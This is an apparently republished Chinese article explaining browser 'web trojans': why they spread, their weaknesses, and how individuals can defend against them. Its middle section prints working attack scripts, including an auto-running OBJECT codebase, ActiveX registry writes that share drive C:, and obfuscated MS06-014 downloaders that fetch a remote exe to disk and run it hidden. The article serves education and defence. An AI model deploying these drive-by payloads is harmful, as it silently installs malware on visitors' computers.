一、總論

網(wǎng)頁木馬一直是國內(nèi)網(wǎng)絡(luò)流行的東西。（金州注釋，據(jù)朋友說，這種東西在國外并不流行。）之所以比較流行金州覺得有如下原因：

1.網(wǎng)頁木馬在各種網(wǎng)絡(luò)威脅中技術(shù)含量相對來說屬于較低的類型。這就意味著他便于制作推廣。

2.免費空間的增多和個人建站的流行，給網(wǎng)頁木馬客觀附帶的造就了很大的生存空間。

3.國內(nèi)上網(wǎng)人數(shù)的奇跡般的遞增，使網(wǎng)頁木馬的受眾層增多。

4.國內(nèi)上網(wǎng)人群目前普遍安全意識較低，很多人使用盜版系統(tǒng)，有時候無法更新補丁或及時更新補丁，（金州注釋，國內(nèi)網(wǎng)頁木馬大多是針對windows系統(tǒng)的ie的）使針對ie漏洞型的網(wǎng)頁木馬生存時間延長。

5.網(wǎng)頁木馬見效快，（金州注釋，這個并不是證明網(wǎng)頁木馬效率高，而是因為受眾多）

6.很多間接推動網(wǎng)絡(luò)安全，擅長腳本技術(shù)的人很及時地推出了眾多簡便式的網(wǎng)頁木馬生成器或網(wǎng)頁木馬程式。此中icefox(冰狐浪子EST)，LCX(haiyangtop.126.com)等對于國內(nèi)網(wǎng)頁木馬的流行起到了奠基的作用。

以上jinzhou只是淺顯說到網(wǎng)頁木馬之所以流行的原因。其中也可看到網(wǎng)頁木馬目前來說還是具有一定優(yōu)點的，尤其是制作操作簡單。和相對收效快的特點。下面簡單說說網(wǎng)頁木馬的一些不足。

1.很多網(wǎng)頁木馬針對的是特有的ie漏洞。（金州注釋，關(guān)于詳細(xì)情形，以下論述）一旦漏洞補上，網(wǎng)頁木馬失效。ie的漏洞相對系統(tǒng)的核心漏洞來說，修補比較容易。（金州注釋，何況有些人根本就不是用ie和ie內(nèi)核瀏覽器）

2.網(wǎng)頁木馬的絕對命中率較低，一般來說10%就很不錯了。（金州注釋，這由多種原因造成，比如受眾方做了其他限制，一些殺毒軟件或監(jiān)控軟件的干擾和警示，對相關(guān)運行網(wǎng)頁木馬的一些控件的解除，比如更名或刪除debug和wsh等會使一些網(wǎng)頁木馬無法成功，一些安全監(jiān)視工具會提示異常運行等等）

3.網(wǎng)頁木馬沒有固定目標(biāo)。缺乏針對性，一定意義上，它只是等著別人來中，它不能主動地選擇受眾。

4.網(wǎng)頁木馬很難感染一些重要部門的重要機器而不被發(fā)現(xiàn)。網(wǎng)頁木馬常常無力顧及木馬被下載后的深入隱藏。很容易被一些有基礎(chǔ)安全知識的人查獲。

5.因為網(wǎng)頁木馬一旦應(yīng)用，即等于間接性的公開了腳本，具有時效性。幾乎不可能有永遠(yuǎn)好使的網(wǎng)頁木馬，（金州注釋，指的是網(wǎng)頁木馬的流程），而一些rootkit甚至能隱藏10年。網(wǎng)頁木馬類流行很少過年。

目前網(wǎng)頁木馬的主要危害，金州覺得主要是利用網(wǎng)頁木馬控制大量機器，間接形成僵尸網(wǎng)絡(luò)進(jìn)行利用tcp/ip協(xié)議漏洞的DOS/DDOS攻擊。和一些其他的商業(yè)非法活動，例如投票，發(fā)布商業(yè)廣告，作為跳板的一些滲透等。很多時候能造成極大的危害。也就是說網(wǎng)頁木馬的利用趨勢已經(jīng)由開始的惡作劇性的對某些機器的窺視變成了利用受眾機器形成一種力量轉(zhuǎn)做為攻擊和謀求商業(yè)利益的武器。

二、網(wǎng)頁木馬的基本工作流程

網(wǎng)頁木馬的基本工作流程，大致是，

1.受眾打開含有網(wǎng)頁木馬代碼的網(wǎng)頁；

2.網(wǎng)頁木馬利用ie漏洞或者一些腳本功能下載一個可執(zhí)行文件或腳本。（金州注釋，很多時候根據(jù)需要附帶同時紀(jì)錄用戶ip）

如以下代碼

<script language="javascript"> 
run_exe="<OBJECT ID=\"RUNIT\" WIDTH=0 HEIGHT=0 TYPE=\"application/x-oleobject\"" 
run_exe+="CODEBASE=\"jinzhou.exe#version=1,1,1,1\">" 
run_exe+="<PARAM NAME=\"_Version\" value=\"65536\">" 
run_exe+="</OBJECT>" 
run_exe+="<HTML><H1>金州提示，網(wǎng)頁加載中，請稍后....正在運行木馬</H1></HTML>"; 
document.open(); 
document.clear(); 
document.writeln(run_exe); 
document.close();

保存為jinzhou.html然后在同目錄下放一個exe文件，起名為jinzhou.exe.運行jinzhou.html,會出現(xiàn)金州提示，網(wǎng)頁加載中，請稍后....正在運行木馬，然后那個jinzhou.exe就會運行。（金州注釋，本地和遠(yuǎn)程都會提示，一般稍有一點安全意識的都不會中，不過事實上這種方法現(xiàn)在仍然會使很多極其不小心的人上當(dāng)。此流程比較經(jīng)典。）

< script language=javascript> 
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>"); 
function f(){ 
a1=document.applets[0]; 
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}"); 
a1.createInstance(); 
Shl = a1.GetObject(); 
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan\\RWC$\\
Flags",402,"REG_DWORD"); 
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan\\RWC$\\
Type",0,"REG_DWORD" 
); 
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan\\RWC$\\
Path","C:\\"); 
} 
function init() 
{ 
setTimeout("f()", 1000); 
} 
init();

調(diào)用本地控件寫注冊表的代碼。此代碼是共享c，當(dāng)然你可以共享任何盤。

<script language="vbscript"> 

const adTypeBinary = 1 
const adSaveCreateOverwrite = 2 
const adModeReadWrite = 3 

set xmlHTTP = CreateObject("Microsoft.XMLHTTP") 
xmlHTTP.open "GET","http://www.xxx.com/jinzhou.EXE", false 
xmlHTTP.send 
contents = xmlHTTP.responseBody 

Set oStr = CreateObject("ADODB.Stream") 
oStr.Mode = adModeReadWrite 
oStr.Type = adTypeBinary 
oStr.Open 

oStr.Write(contents) 
oStr.SaveToFile "c:\\jinzhou.exe", adSaveCreateOverwrite 

</script>

上面以前的Adodb.Stream文件下載代碼核心部分。

<script language="VBScript">
on error resume next
dl = "http://www.xxx.com/jinzhou.exe"
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"
Set x = df.CreateObject(str,"")
a1="Ado"
a2="db."
a3="Str"
a4="eam"
str1=a1&a2&a3&a4
str5=str1
set S = df.createobject(str5,"")
S.type = 1
str6="GET"
x.Open str6, dl, False
x.Send
fname1="g0ld.com"
set F = df.createobject("Scripting.FileSystemObject","")
set tmp = F.GetSpecialFolder(2) 
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
set Q = df.createobject("Shell.Application","")
Q.ShellExecute fname1,"","","open",0
</script>

以上MS06014利用代碼核心。

綜合以上，大致可以看出，網(wǎng)頁木馬的基礎(chǔ)就是非法讓受眾在不知覺得情況下改變用戶配置或下載運行非法程序以非法謀取自己的非法利益。不在一一舉例。在網(wǎng)頁木馬的歷史上影響重大的還有MHT漏洞即Windows在處理畸形MHTML，能執(zhí)行任意遠(yuǎn)程腳本代碼。（金州注釋，國內(nèi)一般稱為chm木馬。冰狐浪子對此有很詳細(xì)的文章。）木馬有2個組成部分，一個是利用MHT漏洞的惡意網(wǎng)頁代碼，另一個是包含惡意程序的CHM文件。把它們都放到網(wǎng)站上，用戶訪問惡意網(wǎng)頁時，會在沒有任何安全提示的情況下，自動下載遠(yuǎn)程CHM文件中的程序并運行。HHCTRL漏洞，HTML幫助ActiveX控件存在問題，利用它可以進(jìn)行跨安全區(qū)域腳本執(zhí)行，從而可以下載并自動執(zhí)行遠(yuǎn)程惡意程序。HTA漏洞，IE瀏覽器允許HTA類型的代碼以全部權(quán)限運行。遠(yuǎn)程HTA代碼可以調(diào)用Wscript.Shell等控件執(zhí)行用戶本地的任意程序，iframe溢出等等。網(wǎng)上相關(guān)資料較多。不再贅述。總體來說，網(wǎng)頁木馬的制作并不復(fù)雜，它的重點往往會在加密和輔助的隱藏上。

三、網(wǎng)頁木馬的基本防范

網(wǎng)頁木馬的基本防范大概如下幾點，（金州注釋，針對個人的，網(wǎng)頁木馬絕大多數(shù)受眾都是個人。）

1.卸載或者改名whs腳本宿主。刪除注冊表｛F935DC22-1CF0-11D0-ADB9-00C04FD58A0B｝

{0D43FE01-F093-11CF-8940-00A0C9054228}，運行regsvr32 scrrun.dll /u 卸載控件等。

2.在我的電腦，屬性，高級，環(huán)境變量中，PATHEXT刪除一些危險的變量，如vbs,vbe,js等。或在文件夾選項，文件類型中更改vbs，Windows Script Host等的關(guān)聯(lián)。

3.禁用ftp，tftp,或改變端口。等防止網(wǎng)頁木馬的利用途徑。找到C:\windows\system32\drivers\Etc 記事本打開其中的services文件會看到一些對應(yīng)的端口，改一下保存就行了。改名debug等。

4.最好安裝殺毒軟件。打開實時監(jiān)控，一般網(wǎng)頁木馬殺毒還是會報警的。

5.提高警惕性，一旦發(fā)現(xiàn)ie運行不正常，比如卡或者無故死掉，或者一場閃出，養(yǎng)成立刻檢查系統(tǒng)的習(xí)慣。

6.多注意查看網(wǎng)頁源代碼，無論多么高明的網(wǎng)頁木馬，在源代碼中也可以看出端倪。

7.注意更新系統(tǒng)補丁。

等等。

（金州注釋，以上為個人見解，技術(shù)日新月異，不一定有效全面，個人愚笨，在學(xué)習(xí)中，不足之處見諒。另，文中一些代碼可能會被殺毒報警，無害。）

責(zé)任編輯 趙毅 zhaoyi#51cto.com TEL:（010）68476636-8001